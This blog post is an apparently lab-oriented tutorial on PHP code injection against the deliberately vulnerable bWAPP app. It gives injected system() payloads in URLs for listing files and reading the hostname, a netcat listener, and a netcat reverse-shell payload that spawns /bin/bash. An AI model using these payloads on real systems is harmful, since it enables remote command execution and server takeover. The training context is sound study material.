Ethical Hacking Playground

hacking is curiosity

PHP Code Injection

Commands

Listen for a connection

nc -lvp 4444

list the files

http://192.168.20.131/bWAPP/phpi.php?message=system(‘ls‘)

view the hostname

http://192.168.20.131/bWAPP/phpi.php?message=system(‘hostname’)

Make a connection to the remote host

http://192.168.20.131/bWAPP/phpi.php?message=system(‘nc -vn 192.168.20.131 4444 -e /bin/bash’)

Demonstration Of The Attack

If you have any questions please comment below.

Advertisements

4 min read

How Cyber Criminals Fish For Passwords From Their Phone

5 days ago krypt0mux

1 min read

10 Most Used Black Hat Hacking Tools | Kali Linux

1 week ago krypt0mux

8 min read

Top 15 Tools Used In Cyber Security

1 week ago krypt0mux

1 min read

Website Hacking

XSStrike Intelligent XSS Discovery & Exploitation Tool

2 weeks ago krypt0mux

%d bloggers like this: